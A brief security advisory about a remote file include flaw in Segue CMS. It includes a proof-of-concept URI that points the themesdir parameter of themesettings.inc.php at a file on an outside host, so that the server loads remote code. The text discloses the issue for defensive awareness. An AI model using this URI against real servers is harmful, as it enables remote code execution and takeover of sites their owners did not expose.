Segue CMS Themesdir Remote File Include Vulnerability

Segue CMS Themesdir Remote File Include Vulnerability

Attackers can exploit this issue via a web client.

The following proof-of-concept URI demonstrates this vulnerability:

http://www.example.com/[path]/themes/program/themesettings.inc.php?themesdir=http://www.example.com/file